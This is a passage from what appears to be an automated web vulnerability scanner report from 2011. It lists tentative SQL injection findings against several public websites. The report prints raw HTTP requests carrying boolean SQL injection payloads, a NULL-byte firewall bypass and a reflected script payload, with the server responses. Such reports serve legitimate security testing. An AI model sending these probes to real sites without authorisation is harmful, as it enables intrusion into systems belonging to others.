00000f3n041240lkxrxz0000000h3n0414ozlkxlm50000000n3n0414bmlkxrxz0000000h3n041590lkzsm2000000073n0414j7lkxlm50000000n3n0414bzlkxlm50000000n3n0411pjlkxrxz0000000h3n040p01lkze3o0000000f3n0415holkxlm50000000n3n040m7alkkxrb0000000x3n0413mklkxrxz0000000h3n04101ulkze3o0000000f3n0412zglkxrxz0000000h3n0413lxlkxrxz0000000h3n040zp4lkze3o0000000f3n04148ilkxlm50000000n3n040xvclkze3o0000000f3n0412yxlkxrxz0000000h3n0415iglkxq0l0000000j3n0413n7lkze3y0000000d3n0416s2lkxpyu0000000k3n0414hplkxlm50000000n3n040znmlk34620000001g3n0414hclkxlm50000000n3n040wd7lkze3o0000000f3n04102plkxrxz0000000h3n0410tylkkpku000000143n040p1alkze3o0000000f3n0400bvlk9pe80000001c3n0415xylk60qe0000001f3n0410lxlkxrxz0000000h3n04103blkxrxz0000000h3n0410telkd7nq0000001a3n0416rslkxppm0000000l3n040c9slk9pe80000001c3n0413mxlkze3o0000000f3n0412emlkze3o0000000f3n0410rdlkdkly000000183n040z9zlkze3y0000000d3n04163plkxlm50000000n3n040z9xlkze3o0000000f3n040m40lkkxrb0000000x3n040zqylkxrxz0000000h3n040mjelkkxrb0000000x3n0412qnlkkplt000000123n0414e9lkze3o0000000f3n0412x6lkxrxz0000000h3n041342lkze3y0000000d3n0416aulkze3o0000000f3n0416atlkxlm50000000n3n041203lkb5u20000001b3n04163clkxlm50000000n3n040afqlkze3o0000000f3n040o0vlkkpqx0000000z3n040z2ilkkxrb0000000x3n0411462865'%20or%201%3d2--%20; sglst=2260sbpelkxlm5026sw00f3m000k00500dsnlkxlm5026sw00n3n040k0n50narllkxlm5026sw00n3n040k0n50ncg5lkxlm5026sw00n3n040k0n50n9rslkkpke0f2un0153n040k0o515am5lkkxr8002zw00y3n040k0o50ycd4lkxlm5026sw00f3m000k00500crglkxlm5026sw00n3n040k0n50ncnolkxlm5026sw00n3n040k0n50nabelkxlm5026sw00n3n040k0n50ndd8lkxlm5026sw00f3m000k00500cy2lkxlm5026sw00n3n040k0n50naoplkb5u209jqc0063e000j00500cnxlkxlm501sim00n3n040k0n50nbq3lkxlm5026sw00n3n040k0n50naoilkxlm501sim00n3n040k0n50nbvplkxlm5026sw00f3m000k00500942lkb5u20mfs300o3l000k005009ullkxlm501sim00n3n040k0n50n8ndlkb5u20mfs300o3l000k00500bvclkxlm5026sw00n3n040k0n50nc5flkxlm5026sw00n3n040k0n50n56blkb5u20mfs300o3l000k00500bjqlkxlm5026sw00n3n040k0n50nawklkxlm5026sw00n3n040k0n50nasulkb5u209jqc0063e000j00500crplkxlm501sim00n3n040k0n50nasqlkxlm5026sw00n3n040k0n50nc5rlkov6e0000000q3n040k0o50qaw8lkxlm5026sw00n3n040k0n50nc60lkxlm5026sw00n3n040k0n50ndc4lkxlm5026sw00n3n040k0n50nd26lkxlm5026sw00n3n040k0n50ndnjlkxlm5026sw00n3n040k0n50ncbclkxlm5026sw00n3n040k0n50nc85lkxlm5026sw00n3n040k0n50ncsslkxlm5026sw00n3n040k0n50nc80lkb5u209jqc0063e000j00500ag2lkd7nq0o5u701a3n040k0o517c1elkxlm5026sw00n3n040k0n50nc81lkkpke0cw1r00i3l000k005009grlkxlm5026sw00n3n040k0n50nc8flkxlm5026sw00n3n040k0n50na6slkkpke0cw1r00i3l000k00500dnalkxlm5026sw00n3n040k0n50n9z6lkxlm5026sw00n3n040k0n50ndbtlkxlm5026sw00n3n040k0n50ndyllkxlm5026sw00n3n040k0n50n0kllklhm40c4010053l000k005009q4lkxlm5026sw00n3n040k0n50nb3zlkxlm501sim00n3n040k0n50n9q5lkb5u20mfs300o3l000k005009mjlkxlm5026sw00f3m000k00500dgflkkpke0f2un0153n040k0o5150t7ljyxb412g6t01i3n040k0o517bo0lkb5u20o8ap01b3n040k0o517bo1lkkyy00cmo50093l000k005009pglkxlm5026sw00n3n040k0n50nd86lklhm40c4010053l000k00500cwalkxlm5026sw00n3n040k0n50ndqllkxlm5026sw00n3n040k0n50nd84lkxlm5026sw00n3n040k0n50ndz3lkxlm5026sw00f3m000k00500cm6lkxlm5026sw00n3n040k0n50ncxdlkxlm5026sw00n3n040k0n50n719lkb5u20omkz00t3n040k0n50o71alkkpke0cw1r00i3l000k00500ctplkxlm5026sw00n3n040k0n50ncc3lkxlm5026sw00n3n040k0n50ndgilkb5u209jqc0063e000j00500cthlkxlm5026sw00n3n040k0n50n4wclkb5u20o8ap00t3n040k0n50oa0ulkxlm501sim00n3n040k0n50n5mrlkb5u20mfs300o3l000k00500arilkxlm5026sw00f3m000k00500cbplkxlm5026sw00n3n040k0n50nbwjlkkyy00eth100w3n040k0o50w9gelkxlm501sim00n3n040k0n50n; vstcnt=417k010r1w4exqe103210524qhoq103210524slly127p20f20g24exp6103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24n86o103210d24pq44103210a24eflo218e104203210724na8i103210e24eyja103210e24f204103210524mqca103210e24nsyl103210f24l16a218e10f203210l24fz24103210924o3dr103210l24bgpn103210524cj2d103210224gqhl103210924e1a9103210l23sti21hj10a203210e24d3rk10pj10m24g197103210524ns52103210l24fqsv103210l24nnav103210f22wb11m520l20m24uzg6218e100203220020324tfmw103210b24flbl103210424qpgs103210324tc6l103210e24f5tg103210324tmhw103210924q8ci103210l24m4sm103210524elor218e10l203210m24uu1v103210m24f9wk103210i24jxig103210f24fvio218e20e20f203210f24uzpw218e10f203210l24eo2u103210624e8bw10321082496o0103210l24fsuv103210924fduc218e10a203210e24ef19103210l24dret103210724uzdp103210b24e9pa103210424cnyl103210g24styu10321092451gt10pj10e24er21103210m24fj52103210924o2lt103210a23eoh127p10l24m1v2103210a24f7qr218e108203210924qnab103210024fgv9218e108203210a24hqyp103210i24kd6k103210c23l4f103210a2

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lkkxr8160852rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh17u4p01m3n050k0p518; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:44:38 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=40110tell1fqe000000013n01; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:44:38 GMT; Path=/
Set-Cookie: sglst=2260sbpelkxlm5026sw00f3m000k00500dsnlkxlm5026sw00o3n050k0o50oarllkxlm5026sw00o3n050k0o50ocg5lkxlm5026sw00o3n050k0o50o9rslkkpke0f2un0163n050k0p516am5lkkxr8002zw00z3n050k0p50zcd4lkxlm5026sw00f3m000k00500crglkxlm5026sw00o3n050k0o50ocnolkxlm5026sw00o3n050k0o50oabelkxlm5026sw00o3n050k0o50odd8lkxlm5026sw00f3m000k00500cy2lkxlm5026sw00o3n050k0o50oaoplkb5u209jqc0063e000j00500cnxlkxlm501sim00o3n050k0o50obq3lkxlm5026sw00o3n050k0o50obvplkxlm5026sw00f3m000k00500aoilkxlm501sim00o3n050k0o50o942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm501sim00o3n050k0o50obvclkxlm5026sw00o3n050k0o50oc5flkxlm5026sw00o3n050k0o50o56blkb5u20mfs300o3l000k00500bjqlkxlm5026sw00o3n050k0o50oawklkxlm5026sw00o3n050k0o50oasulkb5u209jqc0063e000j00500crplkxlm501sim00o3n050k0o50oasqlkxlm5026sw00o3n050k0o50oc5rlkov6e0000000r3n050k0p50raw8lkxlm5026sw00o3n050k0o50oc60lkxlm5026sw00o3n050k0o50odc4lkxlm5026sw00o3n050k0o50od26lkxlm5026sw00o3n050k0o50odnjlkxlm5026sw00o3n050k0o50ocbclkxlm5026sw00o3n050k0o50oc85lkxlm5026sw00o3n050k0o50ocsslkxlm5026sw00o3n050k0o50oc80lkb5u209jqc0063e000j00500ag2lkd7nq0o82o01b3n050k0p518c1elkxlm5026sw00o3n050k0o50oc81lkkpke0cw1r00i3l000k005009grlkxlm5026sw00o3n050k0o50oc8flkxlm5026sw00o3n050k0o50oa6slkkpke0cw1r00i3l000k00500dnalkxlm5026sw00o3n050k0o50o9z6lk
...[SNIP]...

1.16. http://p.addthis.com/pixel [key parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://p.addthis.com
Path:   /pixel

Issue detail

The key parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the key parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pixel?pixelID=57148&partnerID=115&key=segment%00' HTTP/1.1
Host: p.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uid=4dab4fa85facd099; uit=1; psc=3; di=1305052650.60|1305052650.1FE|1304962167.19F|1304955482.1OD; dt=X

Response 1

HTTP/1.0 200 OK
Content-Type: text/html
Connection: close
X-Error-Code: 503
Content-Length: 0


Request 2

GET /pixel?pixelID=57148&partnerID=115&key=segment%00'' HTTP/1.1
Host: p.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uid=4dab4fa85facd099; uit=1; psc=3; di=1305052650.60|1305052650.1FE|1304962167.19F|1304955482.1OD; dt=X

Response 2

HTTP/1.1 302 Found
Date: Wed, 11 May 2011 15:40:01 GMT
Location: http://va.px.invitemedia.com/pixel?key=segment%00%27%27&pixelID=57148&partner_uid=&partnerID=115
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)


1.17. http://player.ooyala.com/player.js [autoplay parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://player.ooyala.com
Path:   /player.js

Issue detail

The autoplay parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the autoplay parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /player.js?autoplay=0'%20and%201%3d1--%20&width=900&deepLinkEmbedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&height=506&embedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr HTTP/1.1
Host: player.ooyala.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tressugar.com/Cannes-Film-Festival-History-16415520c7b9a%22-alert(1)-%226d84b52305d

Response 1

HTTP/1.1 200 OK
Last-Modified: Wed, 11 May 2011 15:59:01 GMT
Content-Type: text/javascript; charset=utf-8
Cache-Control: private, max-age=300
Date: Wed, 11 May 2011 15:59:02 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 14699

(function(){var h=(navigator.appVersion.indexOf("MSIE")!=-1)?true:false;var J=(navigator.appVersion.toLowerCase().indexOf("win")!=-1)?true:false;var C=(navigator.userAgent.toLowerCase().indexOf("linux
...[SNIP]...
);var R=M[Q].substring(T+1,M[Q].length);P[S]=R}}}return P}function x(L){if(l){var i=document.getElementById(l);if(i){i.innerHTML=L;return}}document.write(L)}var b=D();var n=parseInt;var f="ooyalaPlayer294258174_10bh522";var l="";var a=n("900");var d=n("506");if(g||B){if(k=="1"||m=="1"){x("<script type='text/javascript'src='http://player.ooyala.com/mobile_player.js?autoplay=0%27+and+1%3D1--+&deepLinkEmbedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&embedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&embedCodes=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&expires=1305133200&height=506&locale=en-us&signature=cJm71hLAbQnBypm3rzRgSgdP%2FbxgLngsiqj1VdZBzow&width=900'><\/script>")}else{x("<script type='text/javascript'src='http://player.ooyala.com/mobile_player_error.js?reason=unAuthorizedStream&locale="+p+"&width="+a+"&height="+d+"'><\/script>")}}else{if(F(9,0,115)){var u="<div style='width:"+a+"px; height: "+d+"; overflow: hidden'>";var A="&embedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&width=900&height=506&deepLinkEmbedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&video_pcode=92bWI68FEYwSG-GIuRuio-RFAHxq&contactServer=player.ooyala.com/Q2HGKJ-PryQsG7CT&text=_cKen3KTOeyeug5ZNHXzh7RNaRrDsZpj3TMLuE1X0KT5EXLGS4OoWk0_Bfm_e5Z3iPKmfqJ1wtg6wGt1QYjraDi0-2YswZnTCzIiwgx916NXZeqTR8yuK6lC5I2UU75hmLo1-1PgcGsbXLIS_nN_Fh8VGv1UU4l4slL4QW1h0vMfRGDM-b1HK6R0RUEHVWcauw0iBFXogAXJ8wwV-fKXSHGFeV5hj0zToKhdHtaZjsxGcXNs_aoec0AQK3CES6QCwhSIG8y6G5LUyzF_Qi3rClCyMVvf8NA9bBwuMgVbhNSsatgT6PAZTRU5R87uqMsuUi74h717E_wteYo_00YTuDQRQoHpPkaUlw54oRcVCcNR4NB16seqVUUMcDDJiwCYcnzlIAl0wBecDG4BdIiee_5Dw7Vf-ZarL-IR0vlEjspiwZuxnt32D8tAQVRescdSbgqvYsCcdBiVlAFpRiZlStCKPFfH2WyElaSL2LVXaXC2t86MHSn_RaJYDSLrNRUbe-7KnPKVmRj32-xxjO7IyUZU58J_i977Qwkpnh-QpRXYMpWghKemwenbtMvGGOyhijM8kmJkM3u82xgo1MHv7WLqQzlXjTJoAniWHEv_UvsC9200ok_jTe3xFLmCS3-F8ZazIac4_mlj6aNiSu0y1U4H4L3tY7ekBGd-Q2fVtyKmpV9ZajS-m1UQKBMJ6qHO7E2wcnIM_0ervHY_alKlZQr-k04PdjiVazoz-hsuYP0gRElSy-8OTZ1LmryvKg5fkeXCQIcE27if4lO9I-1Xl6VJxKyCik9Wtq4qtqU1HVf-8Z-kosjD2nP527lRXCodEES2GxL_7dIoO3kyNnK6mjrH5F4j9LS7tHVDZuwNsGRMzjgbiplvWKMGei-R8eg6IzKVtHAjKAvdmZX8Jd6ySuG1dY1OlxfV-TDHq52H5cUlMvZQTRPLhdYPe4KJAv8gMegAKMEFgD_LIlti7vwRugTIkyJVIBfW5AiFS9kwXDQftEvSxJ1izY6YhKUFoS7d9OIx2niFnRi-uHdcn-sFx7oH5UHihumQ4Cri2nxtR5s3Q
...[SNIP]...

Request 2

GET /player.js?autoplay=0'%20and%201%3d2--%20&width=900&deepLinkEmbedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&height=506&embedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr HTTP/1.1
Host: player.ooyala.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tressugar.com/Cannes-Film-Festival-History-16415520c7b9a%22-alert(1)-%226d84b52305d

Response 2

HTTP/1.1 200 OK
Last-Modified: Wed, 11 May 2011 15:59:02 GMT
Content-Type: text/javascript; charset=utf-8
Cache-Control: private, max-age=300
Date: Wed, 11 May 2011 15:59:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 14377

(function(){var h=(navigator.appVersion.indexOf("MSIE")!=-1)?true:false;var J=(navigator.appVersion.toLowerCase().indexOf("win")!=-1)?true:false;var C=(navigator.userAgent.toLowerCase().indexOf("linux
...[SNIP]...
);var R=M[Q].substring(T+1,M[Q].length);P[S]=R}}}return P}function x(L){if(l){var i=document.getElementById(l);if(i){i.innerHTML=L;return}}document.write(L)}var b=D();var n=parseInt;var f="ooyalaPlayer497710943_10bh523";var l="";var a=n("900");var d=n("506");if(g||B){if(k=="1"||m=="1"){x("<script type='text/javascript'src='http://player.ooyala.com/mobile_player.js?autoplay=0%27+and+1%3D2--+&deepLinkEmbedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&embedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&embedCodes=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&expires=1305133200&height=506&locale=en-us&signature=iUEVte9f5HaJ1M131WCxeiYVSNnOcNKEJ5UUBu24uhw&width=900'><\/script>")}else{x("<script type='text/javascript'src='http://player.ooyala.com/mobile_player_error.js?reason=unAuthorizedStream&locale="+p+"&width="+a+"&height="+d+"'><\/script>")}}else{if(F(9,0,115)){var u="<div style='width:"+a+"px; height: "+d+"; overflow: hidden'>";var A="&embedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&width=900&height=506&deepLinkEmbedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&video_pcode=92bWI68FEYwSG-GIuRuio-RFAHxq&contactServer=player.ooyala.com/Q2HGKJ-PryQsG7CT&text=fUej88OMHPb3U_tHoyCkvhse2QnPqpZT20h8KWdHl9JwlE5d2k2XfYSPjFOnYXP4AM5ubnKWjYy4ekw3Xx5b-hShkfQR7oy27op0D_vQQRU_rGGJ1mtWQwEWkhX7aqN7oO397yAuuUplCjtXoW5XpByiVUT2bdq7VCLoQsDi0WmQGY_bcgincfeA5Cf5pC_XHhzOirFtPB_9NRAN3jK0Ps4VbPd4fqaBqSOcb6P32Quplw6r96zwpi3gbcvBbofYEjNSxq3Cxu-fSkVKT9kB9cs1muOO2_pPBaucRD8LG6zckJlbeoScXeHOPyTbaiqgFmC4KC6RWzNNp-MR9RC4u83DS20ienlhHxpz0JdXBcvyyqBIDU1glw6V4WJbNEES5CW7G_ydv1Pw7J3k8uiAOVILX2-b23hSb-aMHqeoOn8Q6HdGCGB9GZo7BZPybATg7WFnzgtOUPdZlKjiXw3drB9ZIsPFepHL3SjPlMJJ_W1oWkWJm808qa4T6i65kD6AHZCEETGrFhmWSKpvdCOz4r381PooSb8-DkqV0FC38P0QcnKhZE0Cw5MOjAsyFnG_pM_W5QLC1M36IR9pH6DXvgpxtUxyXsek5MGNxUJhKZs2Y9bWBZHxAzsjaHiyfPHIsfRbwf3aqLpTywm0Chul04Xz8Cil2WTvMzPJMLCu7JfFosv7P-aeOpSdGeB4g8zdwf_qWrJnr4IXubn2G3T9duzFTmLLNNrmZCDFYC8jK4IJy4JIPxIdUvjJ4Aw95CH-XzKU865M7hVJjEfs6b9WF6FuHgi02nb-NxAsZZ002Aqnh05O1BCs3JnW_nw9eIzDbz084wSG-uat3mQj2cYnMaxL9Z0OEwFQQjrj7aKGTEpxPmtxnijWZ1-A8kG69OxtovDrgX_6nwZVVSAFeQoGkY7Yt5pDw2a_PI1Na0Mty-Av5cIgnjBJfM2ikYuQNiV7IDrFn2jWu0lR9onuIIAjIymA9TtrmpFiFLp3FuQB-OlKTK1S_7WgmnLs3b4_AinyBPUGmw9h_0A61oFWR60ZhK2waipXzFNYHBEKoNPGw3wS_zm
...[SNIP]...

1.18. http://www.mayoclinic.com/health/pink-eye/DS00258 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mayoclinic.com
Path:   /health/pink-eye/DS00258

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /health/pink-eye/DS00258' HTTP/1.1
Host: www.mayoclinic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Wed, 11 May 2011 15:24:13 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=59237231;domain=.mayoclinic.com;expires=Fri, 03-May-2041 15:24:13 GMT;path=/
Set-Cookie: CFTOKEN=96566466;domain=.mayoclinic.com;expires=Fri, 03-May-2041 15:24:13 GMT;path=/
Set-Cookie: JSESSIONID=803043628a413e9169c83b35431d2a5b195b;path=/
location: http://www.mayoclinic.com/invoke.cfm?ID=displayErrorPage&nErrorID=4670677
Content-Type: text/html; charset=UTF-8

Request 2

GET /health/pink-eye/DS00258'' HTTP/1.1
Host: www.mayoclinic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 11 May 2011 15:24:14 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=56413216;domain=.mayoclinic.com;expires=Fri, 03-May-2041 15:24:14 GMT;path=/
Set-Cookie: CFTOKEN=21607096;domain=.mayoclinic.com;expires=Fri, 03-May-2041 15:24:14 GMT;path=/
Set-Cookie: JSESSIONID=a030c8e57c7f4af8bb75796763322d6c6a53;path=/
location: http://www.mayoclinic.com/health/page-not-found/404
Content-Type: text/html; charset=UTF-8


1.19. http://www.mayoclinic.com/health/pink-eye/DS00258 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mayoclinic.com
Path:   /health/pink-eye/DS00258

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /health/pink-eye/DS00258?1'=1 HTTP/1.1
Host: www.mayoclinic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Wed, 11 May 2011 15:22:21 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=6602448;domain=.mayoclinic.com;expires=Fri, 03-May-2041 15:22:21 GMT;path=/
Set-Cookie: CFTOKEN=80404535;domain=.mayoclinic.com;expires=Fri, 03-May-2041 15:22:21 GMT;path=/
Set-Cookie: JSESSIONID=d430d04d9acac7e404997e606e1e13247950;path=/
location: http://www.mayoclinic.com/invoke.cfm?ID=displayErrorPage&nErrorID=4670662
Content-Type: text/html; charset=UTF-8

Request 2

GET /health/pink-eye/DS00258?1''=1 HTTP/1.1
Host: www.mayoclinic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 11 May 2011 15:22:22 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=59806861;domain=.mayoclinic.com;expires=Fri, 03-May-2041 15:22:22 GMT;path=/
Set-Cookie: CFTOKEN=41485298;domain=.mayoclinic.com;expires=Fri, 03-May-2041 15:22:22 GMT;path=/
Set-Cookie: JSESSIONID=6a30600f2f665bb3e3593552b65493a33f15;path=/
location: http://www.mayoclinic.com/health/page-not-found/404
Content-Type: text/html; charset=UTF-8


1.20. http://www.starpulse.com/sp_comments/paginate_comments.php [object_type parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starpulse.com
Path:   /sp_comments/paginate_comments.php

Issue detail

The object_type parameter appears to be vulnerable to SQL injection attacks. The payloads 95955136%20or%201%3d1--%20 and 95955136%20or%201%3d2--%20 were each submitted in the object_type parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sp_comments/paginate_comments.php?offset=0&limit=25&object_id=222525&object_type=095955136%20or%201%3d1--%20 HTTP/1.1
Host: www.starpulse.com
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147392117.1305125763.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147392117.1833191638.1305125763.1305125763.1305125763.1; __utmc=147392117; __utmb=147392117.1.10.1305125763; __gads=ID=c5cdb67679bbc497:T=1305125765:S=ALNI_Ma2G0hQC62Wu8GFslZjcHMEMsIgZQ; __qca=P0-2123288066-1305125769395

Response 1

HTTP/1.0 500 Internal Server Error
Date: Wed, 11 May 2011 15:05:37 GMT
Server: Apache/2.2.17 (FreeBSD) PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 0

Request 2

GET /sp_comments/paginate_comments.php?offset=0&limit=25&object_id=222525&object_type=095955136%20or%201%3d2--%20 HTTP/1.1
Host: www.starpulse.com
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147392117.1305125763.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147392117.1833191638.1305125763.1305125763.1305125763.1; __utmc=147392117; __utmb=147392117.1.10.1305125763; __gads=ID=c5cdb67679bbc497:T=1305125765:S=ALNI_Ma2G0hQC62Wu8GFslZjcHMEMsIgZQ; __qca=P0-2123288066-1305125769395

Response 2

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:05:47 GMT
Server: Apache/2.2.17 (FreeBSD) PHP/5.3.5 with Suhosin-Patch
